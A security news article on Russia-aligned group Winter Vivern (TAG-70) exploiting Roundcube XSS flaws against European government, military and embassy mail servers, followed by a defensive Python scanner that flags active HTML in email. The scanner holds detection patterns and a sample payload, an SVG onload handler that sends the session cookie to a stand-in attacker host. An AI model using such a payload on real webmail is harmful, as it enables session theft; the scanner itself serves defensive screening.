Russian APT 'Winter Vivern' Targets European Government, Military



TAG-70’s sophisticated espionage campaign targeted a range of geopolitical targets, suggesting a highly capable and well-funded state-backed threat actor.
February 17, 2024
The Russia-aligned threat group known as Winter Vivern was discovered exploiting cross-site scripting (XSS) vulnerabilities in Roundcube webmail servers across Europe in October 2023, and now its victims are coming to light.
The group mainly targeted government, military, and national infrastructure in Georgia, Poland, and Ukraine, according to Recorded Future's Insikt Group report on the campaign released today.
The report also highlighted additional targets, including the Embassy of Iran in Moscow, the Embassy of Iran in the Netherlands, and the Embassy of Georgia in Sweden.
Utilizing sophisticated social engineering techniques, the APT (which Insikt tracks as TAG-70 and which is also known as TA473 and UAC-0114) used a Roundcube zero-day exploit to gain unauthorized access to targeted mail servers at more than 80 separate organizations, ranging from the transport and education sectors to chemical and biological research organizations.
The campaign is thought to have been deployed to gather intelligence on European political and military affairs, potentially to gain strategic advantages or undermine European security and alliances, according to Insikt.
The group is suspected of conducting cyber-espionage campaigns serving the interests of Belarus and Russia, and has been active since at least December 2020.
The October campaign was linked to TAG-70's previous activity against Uzbekistan government mail servers, reported by Insikt Group in February 2023.
An obvious motivation for the Ukrainian targeting is the conflict with Russia.
"In the context of the ongoing war in Ukraine, compromised email servers may expose sensitive information regarding Ukraine's war effort and planning, its relationships, and negotiations with its partner countries as it seeks additional military and economic assistance, [which] expose third parties cooperating with the Ukrainian government privately, and reveal fissures within the coalition supporting Ukraine," the Insikt report noted.
Meanwhile, the focus on Iranian embassies in Russia and the Netherlands likely reflects an effort to assess Iran's ongoing diplomatic engagements and foreign policy positions, particularly considering Iran's support for Russia in the conflict in Ukraine.
Similarly, the espionage targeting the Georgian Embassy in Sweden and the Georgian Ministry of Defense probably stems from comparable foreign policy-driven objectives, especially as Georgia has revitalized its pursuit of European Union membership and NATO accession in the aftermath of Russia's incursion into Ukraine in early 2022.
Other notable targets included organizations in the logistics and transportation industries, which is telling in the context of the war in Ukraine, as robust logistics networks have proved crucial for both sides in maintaining their ability to fight.
Cyber-espionage campaigns have been ramping up: Earlier this month, a sophisticated Russian APT launched a targeted PowerShell attack campaign against the Ukrainian military, while another Russian APT, Turla, targeted Polish NGOs using a novel backdoor malware.
Ukraine has also launched its own cyberattacks against Russia, targeting the servers of Moscow Internet service provider M9 Telecom in January, in retaliation for the Russia-backed breach of Kyivstar mobile phone operator.
But the Insikt Group report noted that defending against attacks like these can be difficult, especially in the case of zero-day vulnerability exploitation.
However, organizations can mitigate the impact of a compromise by encrypting emails and considering alternative forms of secure communications for the transmission of particularly sensitive information.
It's also crucial to ensure that all servers and software are patched and kept up to date, and users should only open emails from trusted contacts. Note that a webmail XSS bug fires as soon as the client renders a crafted message, so user caution alone is a weak control and patching the webmail software remains the one that matters most.
Organizations should also limit the amount of sensitive information stored on mail servers by practicing good hygiene and reducing data retention, and should restrict sensitive information and conversations to more secure high-side systems whenever possible.
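The attack described above hinges on a mail message that carries active HTML content, which a vulnerable webmail client then renders unescaped. As an added illustration of what a mail gateway or incident responder can check for, the following script (written for this page, not code from the article, Recorded Future or Roundcube) parses raw RFC 822 messages and flags HTML parts containing script tags, SVG elements, inline event handlers, javascript: URIs and embedded frames. The pattern list, the two sample messages and the host attacker.invalid are constructed for the example; the patterns are a coarse heuristic, not a signature for any specific TAG-70 payload.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Patterns for active content that has no business in a mail body. A message
# carrying them is not exploitable by itself: it becomes so when a webmail
# client with an XSS bug renders it unescaped. Heuristic list, constructed here.
SUSPICIOUS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "svg_element": re.compile(r"<\s*svg\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "embedded_frame": re.compile(r"<\s*(?:iframe|object|embed)\b", re.I),
}


def html_parts(msg):
    """Yield the decoded text of every text/html part, walking nested multiparts."""
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        payload = part.get_payload(decode=True)  # undoes base64 / quoted-printable
        if payload is None:
            continue
        charset = part.get_content_charset() or "utf-8"
        yield payload.decode(charset, errors="replace")


def scan_message(raw):
    """Return (part_index, pattern_name, snippet) for every hit in raw RFC 822 bytes."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for idx, html in enumerate(html_parts(msg)):
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            for m in pattern.finditer(html):
                findings.append((idx, name, html[m.start():m.start() + 40]))
    return findings


def build_sample(html_body):
    """Build a multipart/alternative message. Constructed sample, not a real TAG-70 lure."""
    msg = EmailMessage()
    msg["From"] = "sender@example.org"
    msg["To"] = "recipient@example.org"
    msg["Subject"] = "Meeting notes"
    msg.set_content("Please see the notes below.")
    msg.add_alternative(html_body, subtype="html")
    return msg.as_bytes()


BENIGN = build_sample(
    "<html><body><p>Agenda attached. See you at <b>10:00</b>.</p></body></html>"
)

# Hypothetical payload: an SVG whose event handler sends the session cookie to
# an attacker-controlled host (attacker.invalid is a reserved, non-routable TLD).
MALICIOUS = build_sample(
    "<html><body><p>Agenda attached.</p>\n"
    "<svg onload=\"fetch('https://attacker.invalid/?c='+document.cookie)\"></svg>\n"
    "</body></html>"
)


def triage(samples):
    """Map each sample name to the set of pattern names that fired on it."""
    return {name: {hit[1] for hit in scan_message(raw)} for name, raw in samples.items()}


if __name__ == "__main__":
    for name, hits in triage({"benign": BENIGN, "malicious": MALICIOUS}).items():
        print(f"{name}: {sorted(hits) or 'clean'}")
```

The scan decodes each part before matching, so a payload hidden behind base64 or quoted-printable transfer encoding is still seen. Expect false positives on legitimate marketing mail that uses event handlers; the value is in routing such messages to review rather than blocking them outright.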
The report also noted that responsible disclosure of vulnerabilities, particularly those exploited by APT actors such as TAG-70, is crucial for several reasons.
A threat intelligence analyst at Recorded Future's Insikt Group explained via email that this approach ensures vulnerabilities are patched and rectified quickly before others discover and abuse them, and enables containment of exploits by sophisticated attackers, preventing broader and more rapid harm.
"Ultimately, this approach addresses the immediate risks and encourages long-term improvements in global cybersecurity practices," the analyst explained.
Nathan Eddy, Contributing Writer

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.